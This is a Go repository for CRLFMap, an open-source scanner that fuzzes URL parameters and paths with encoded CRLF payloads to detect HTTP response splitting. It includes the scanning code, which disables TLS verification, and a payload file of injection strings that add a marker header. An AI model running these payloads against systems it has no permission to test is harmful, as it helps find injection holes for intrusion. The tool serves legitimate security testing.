├── .gitignore ├── LICENSE ├── README.md ├── cmd ├── root.go └── scan.go ├── main.go └── payloads.txt /.gitignore: -------------------------------------------------------------------------------- 1 | domains.txt 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Ryan D'Amour 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CRLFMap 2 | 3 | CRLFMap is a tool to find HTTP Splitting vulnerabilities 4 | 5 | ## Why? 6 | - I wanted to write a tool in Golang for concurrency 7 | - I wanted to be able to fuzz _both_ parameters and paths 8 | 9 | ## Installation 10 | 11 | ```bash 12 | go get github.com/ryandamour/crlfmap 13 | ``` 14 | 15 | ## Help 16 | ```bash 17 | Available Commands: 18 | help Help about any command 19 | scan A scanner for all your CRLF needs 20 | 21 | Flags: 22 | -h, --help help for crlfmap 23 | ``` 24 | 25 | ## `scan` usage 26 | 27 | ```bash 28 | crlfmap scan --domains domains.txt --output results.txt 29 | 30 | =============================================================== 31 | CRLFMap v0.0.1 32 | by Ryan D'Amour @ryandamour 33 | =============================================================== 34 | _ __ 35 | | |/ _| 36 | ___ _ __| | |_ _ __ ___ __ _ _ __ 37 | / __| '__| | _| '_ ' _ \/ _' | '_ \ 38 | | (__| | | | | | | | | | | (_| | |_) | 39 | \___|_| |_|_| |_| |_| |_|\__,_| .__/ 40 | | | 41 | |_| 42 | 43 | v0.0.1 44 | ----------------------- 45 | :: Domains : domains.txt 46 | :: Payloads : payloads.txt 47 | :: Threads : 1 48 | :: Output : results.txt 49 | :: User Agent : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 50 | :: Timeout : 10 51 | :: Delay : 0 52 | ----------------------- 53 | [+]http://localhost:3000/v1/%0AInjected-Header:CRLFInjecttest.json: is Vulnerable 54 | [+]http://localhost:3000/v1/%20%0AInjected-Header:CRLFInjecttest.json: is Vulnerable 55 | ``` 56 | 57 | ## Contributing 58 | Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change. 59 | 60 | Please make sure to update tests as appropriate. 61 | 62 | ## License 63 | [MIT](https://choosealicense.com/licenses/mit/) 64 | -------------------------------------------------------------------------------- /cmd/root.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "os/signal" 7 | "context" 8 | 9 | "github.com/spf13/cobra" 10 | ) 11 | 12 | var mainContext context.Context 13 | 14 | var rootCmd = &cobra.Command{ 15 | Use: "crlfmap", 16 | SilenceUsage: true, 17 | } 18 | 19 | func Execute() { 20 | var cancel context.CancelFunc 21 | mainContext, cancel = context.WithCancel(context.Background()) 22 | defer cancel() 23 | 24 | signalChan := make(chan os.Signal, 1) 25 | signal.Notify(signalChan, os.Interrupt) 26 | defer func() { 27 | signal.Stop(signalChan) 28 | cancel() 29 | }() 30 | go func() { 31 | select { 32 | case <-signalChan: 33 | // caught CTRL+C 34 | fmt.Println("\n[!] Keyboard interrupt detected, terminating.") 35 | cancel() 36 | os.Exit(1) 37 | case <-mainContext.Done(): 38 | } 39 | }() 40 | 41 | if err := rootCmd.Execute(); err != nil { 42 | fmt.Println(err) 43 | os.Exit(1) 44 | } 45 | } 46 | 47 | 48 | func init() { 49 | fmt.Printf(`=============================================================== 50 | CRLFMap v0.0.1 51 | by Ryan D'Amour @ryandamour 52 | ===============================================================`) 53 | } 54 | 55 | func er(msg interface{}) { 56 | fmt.Println("Error:", msg) 57 | os.Exit(1) 58 | } 59 | -------------------------------------------------------------------------------- /cmd/scan.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "bufio" 5 | "fmt" 6 | "log" 7 | "net/http" 8 | "os" 9 | "net/url" 10 | "sync" 11 | "strings" 12 | "time" 13 | "crypto/tls" 14 | 15 | "github.com/spf13/cobra" 16 | "github.com/cheggaaa/pb/v3" 17 | ) 18 | 19 | var domains string 20 | var payloads string 21 | var output string 22 | var userAgent string 23 | var timeout int 24 | var threads int 25 | var delay int 26 | var verbose bool 27 | var version = "v0.0.1" 28 | 29 | func crlfMapCmd() *cobra.Command { 30 | crlfMapCmd := &cobra.Command { 31 | Use: "scan", 32 | Short: "A scanner for all your CRLF needs", 33 | Run: crlfMapFunc, 34 | } 35 | 36 | crlfMapCmd.Flags().StringVarP(&domains, "domains", "d", "", "Location of domains with parameters to scan") 37 | crlfMapCmd.Flags().StringVarP(&payloads, "payloads", "p", "payloads.txt", "Location of payloads to generate on requests") 38 | crlfMapCmd.Flags().StringVarP(&output, "output", "o", "", "Location to save results") 39 | crlfMapCmd.Flags().StringVarP(&userAgent, "user-agent", "u", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", "User agent for requests") 40 | crlfMapCmd.Flags().IntVarP(&timeout, "timeout", "", 10, "The amount of time needed to close a connection that could be hung") 41 | crlfMapCmd.Flags().IntVarP(&delay, "delay", "", 0, "The time each threads waits between requests in milliseconds") 42 | crlfMapCmd.Flags().IntVarP(&threads, "threads", "t", 1, "Number of threads to run crlfmap on") 43 | crlfMapCmd.Flags().BoolVarP(&verbose, "verbose", "v", false, "verbose output") 44 | 45 | crlfMapCmd.MarkFlagRequired("domains") 46 | 47 | return crlfMapCmd 48 | } 49 | 50 | func crlfMapFunc(cmd *cobra.Command, args []string) { 51 | var wg sync.WaitGroup 52 | 53 | fmt.Printf(` 54 | _ __ 55 | | |/ _| 56 | ___ _ __| | |_ _ __ ___ __ _ _ __ 57 | / __| '__| | _| '_ ' _ \/ _' | '_ \ 58 | | (__| | | | | | | | | | | (_| | |_) | 59 | \___|_| |_|_| |_| |_| |_|\__,_| .__/ 60 | | | 61 | |_| 62 | 63 | %s 64 | ----------------------- 65 | :: Domains : %s 66 | :: Payloads : %s 67 | :: Threads : %d 68 | :: Output : %s 69 | :: User Agent : %s 70 | :: Timeout : %d 71 | :: Delay : %d 72 | ----------------------- 73 | `, version, domains, payloads, threads, output, userAgent, timeout, delay) 74 | 75 | if threads <= 0 { 76 | fmt.Println("Threads must be larger than 0") 77 | os.Exit(1) 78 | } 79 | 80 | payloadsFile := fileReader(payloads) 81 | domainsFile := fileReader(domains) 82 | progressBar := pb.New(len(domainsFile) * len(payloadsFile)) 83 | 84 | for _, domain := range domainsFile { 85 | for _, payload := range payloadsFile { 86 | 87 | fuzzedURL := fuzzURL(domain, payload) 88 | 89 | for ithreads := 0; ithreads < threads; ithreads++ { 90 | for _, requestURI := range *fuzzedURL { 91 | if verbose == false { 92 | progressBar.Start() 93 | } 94 | wg.Add(1) 95 | progressBar.Increment() 96 | go makeRequest(requestURI, timeout, &wg) 97 | if delay > 0 { 98 | time.Sleep(time.Duration(delay) * time.Millisecond) 99 | } 100 | wg.Wait() 101 | } 102 | } 103 | wg.Wait() 104 | } 105 | } 106 | progressBar.Finish() 107 | } 108 | 109 | func fuzzURL(domain string, payload string) *[]string { 110 | var fuzzedURL []string 111 | var fuzzedParams []string 112 | 113 | // Make sure parameter are present 114 | if strings.Contains(domain, "?") { 115 | paramStr := strings.Split(domain, "?")[1] 116 | params := strings.Split(paramStr, "&") 117 | domainPrefix := strings.Split(domain, "?")[0] 118 | URL := domainPrefix+"?" 119 | 120 | paramFuzzCount := 0 121 | // Rebuild parameters so we can work with each parameter individually (I may be doing this wrong) 122 | // Clear list before concatentation again 123 | fuzzedParams = nil 124 | for _, param := range params { 125 | fuzzedParams = append(fuzzedParams,param) 126 | 127 | if paramFuzzCount != (len(params) - 1) { 128 | fuzzedParams = append(fuzzedParams,"&") 129 | } 130 | paramFuzzCount += 1 131 | } 132 | 133 | // Inject payload into each parameter consecutively. We don't want to 134 | // have server errors for actions that could require specific strings 135 | for paramPayloadCount := 0; paramPayloadCount < len(fuzzedParams); paramPayloadCount++ { 136 | finalFuzzedParams := make([]string, len(fuzzedParams)) 137 | copy(finalFuzzedParams, fuzzedParams) 138 | finalFuzzedParams[paramPayloadCount] = fuzzedParams[paramPayloadCount] + payload 139 | 140 | flattenedURL := URL+strings.Join(finalFuzzedParams[:], "") 141 | fuzzedURL = append(fuzzedURL,flattenedURL) 142 | } 143 | } 144 | 145 | //Fuzz endpoints. Keeping this seperated from parameters. Maybe add flags for types of fuzzing later? 146 | u, err := url.Parse(domain) 147 | if err != nil { 148 | panic(err) 149 | } 150 | 151 | endpoint := u.Path 152 | scheme := u.Scheme 153 | host := u.Host 154 | 155 | for endpointPayloadCount := 0; endpointPayloadCount < strings.Count(endpoint, "/"); endpointPayloadCount++ { 156 | finalEndpoint := replaceNth(endpoint, "/", "/"+payload, endpointPayloadCount+1) 157 | finalEndpointUrl := []string{scheme,"://", host, finalEndpoint} 158 | flattenedURL := strings.Join(finalEndpointUrl, "") 159 | fuzzedURL = append(fuzzedURL,flattenedURL) 160 | } 161 | 162 | return &fuzzedURL 163 | } 164 | 165 | 166 | // Thanks stackoverflow 167 | func replaceNth(s, old, new string, n int) string { 168 | i := 0 169 | for m := 1; m <= n; m++ { 170 | x := strings.Index(s[i:], old) 171 | if x < 0 { 172 | break 173 | } 174 | i += x 175 | if m == n { 176 | return s[:i] + new + s[i+len(old):] 177 | } 178 | i += len(old) 179 | } 180 | return s 181 | } 182 | 183 | func fileReader(ulist string) []string { 184 | var buffer []string 185 | file, err := os.Open(ulist) 186 | if err != nil { 187 | log.Fatal(err) 188 | } 189 | defer file.Close() 190 | 191 | scanner := bufio.NewScanner(file) 192 | for scanner.Scan() { 193 | list := scanner.Text() 194 | buffer = append(buffer, list) 195 | } 196 | if err := scanner.Err(); err != nil { 197 | log.Fatal(err) 198 | } 199 | return buffer 200 | 201 | } 202 | 203 | func makeRequest(uri string, timeoutFlag int, wg *sync.WaitGroup) { 204 | defer wg.Done() 205 | 206 | URL := uri 207 | 208 | client := &http.Client{ 209 | CheckRedirect: func(req *http.Request, via []*http.Request) error { 210 | return http.ErrUseLastResponse 211 | }, 212 | Timeout: time.Duration(timeoutFlag)*time.Second, 213 | Transport: &http.Transport{ 214 | MaxIdleConns: 100, 215 | MaxIdleConnsPerHost: 100, 216 | TLSClientConfig: &tls.Config{ 217 | InsecureSkipVerify: true, 218 | }, 219 | }} 220 | 221 | req, err := http.NewRequest("GET", URL, nil) 222 | if err != nil { 223 | if verbose == true { 224 | fmt.Println(err) 225 | } 226 | return 227 | } 228 | req.Header.Set("User-Agent",userAgent) 229 | 230 | resp, err := client.Do(req) 231 | if err != nil { 232 | fmt.Println(err) 233 | } 234 | 235 | 236 | if err != nil { 237 | if verbose == true { 238 | fmt.Println(err) 239 | } 240 | return 241 | } 242 | 243 | 244 | if verbose == true { 245 | fmt.Printf("%s (Status : %d)\n", URL, resp.StatusCode) 246 | } 247 | 248 | for key := range resp.Header { 249 | if key == "Injected-Header" { 250 | if output != "" { 251 | f, err := os.OpenFile(output, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) 252 | if err != nil { 253 | if verbose == true { 254 | fmt.Println(err) 255 | } 256 | } 257 | f.WriteString(URL+"\n"); 258 | } 259 | fmt.Println("[+]" + URL + ": is Vulnerable") 260 | } 261 | } 262 | } 263 | 264 | func init() { 265 | rootCmd.AddCommand(crlfMapCmd()) 266 | } 267 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "github.com/ryandamour/crlfmap/cmd" 4 | 5 | func main() { 6 | cmd.Execute() 7 | } 8 | -------------------------------------------------------------------------------- /payloads.txt: -------------------------------------------------------------------------------- 1 | %0AInjected-Header:CRLFInject 2 | %0A%20Injected-Header:CRLFInject 3 | %20%0AInjected-Header:CRLFInject 4 | %23%OAInjected-Header:CRLFInject 5 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 6 | %E5%98%8A%E5%98%8D%0AInjected-Header:CRLFInject 7 | %3F%0AInjected-Header:CRLFInject 8 | %0AInjected-Header:CRLFInject 9 | %0A%20Injected-Header:CRLFInject 10 | %20%0AInjected-Header:CRLFInject 11 | %23%OAInjected-Header:CRLFInject 12 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 13 | %E5%98%8A%E5%98%8D%0AInjected-Header:CRLFInject 14 | %3F%0AInjected-Header:CRLFInject 15 | %0DInjected-Header:CRLFInject 16 | %0D%20Injected-Header:CRLFInject 17 | %20%0DInjected-Header:CRLFInject 18 | %23%0DInjected-Header:CRLFInject 19 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 20 | %E5%98%8A%E5%98%8D%0DInjected-Header:CRLFInject 21 | %3F%0DInjected-Header:CRLFInject 22 | %0DInjected-Header:CRLFInject 23 | %0D%20Injected-Header:CRLFInject 24 | %20%0DInjected-Header:CRLFInject 25 | %23%0DInjected-Header:CRLFInject 26 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 27 | %E5%98%8A%E5%98%8D%0DInjected-Header:CRLFInject 28 | %3F%0DInjected-Header:CRLFInject 29 | %0D%0AInjected-Header:CRLFInject 30 | %0D%0A%20Injected-Header:CRLFInject 31 | %20%0D%0AInjected-Header:CRLFInject 32 | %23%0D%0AInjected-Header:CRLFInject 33 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 34 | %E5%98%8A%E5%98%8D%0D%0AInjected-Header:CRLFInject 35 | %3F%0D%0AInjected-Header:CRLFInject 36 | %0D%0AInjected-Header:CRLFInject 37 | %0D%0A%20Injected-Header:CRLFInject 38 | %20%0D%0AInjected-Header:CRLFInject 39 | %23%0D%0AInjected-Header:CRLFInject 40 | %E5%98%8A%E5%98%8DInjected-Header:CRLFInject 41 | %E5%98%8A%E5%98%8D%0D%0AInjected-Header:CRLFInject 42 | %3F%0D%0AInjected-Header:CRLFInject 43 | %0D%0A%09Injected-Header:CRLFInject 44 | %0D%0A%09Injected-Header:CRLFInject 45 | %250AInjected-Header:CRLFInject 46 | %25250AInjected-Header:CRLFInject 47 | %%0A0AInjected-Header:CRLFInject 48 | %25%30AInjected-Header:CRLFInject 49 | %25%30%61Injected-Header:CRLFInject 50 | %u000AInjected-Header:CRLFInject 51 | %2F%2E%2E%0D%0AInjected-Header:CRLFInject 52 | %2E%2E%2F%0D%0AInjected-Header:CRLFInject 53 | %2F..%0D%0AInjected-Header:CRLFInject 54 | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++Injected-Header:CRLFInject 55 | - *Injected-Header:CRLFInject 56 | --------------------------------------------------------------------------------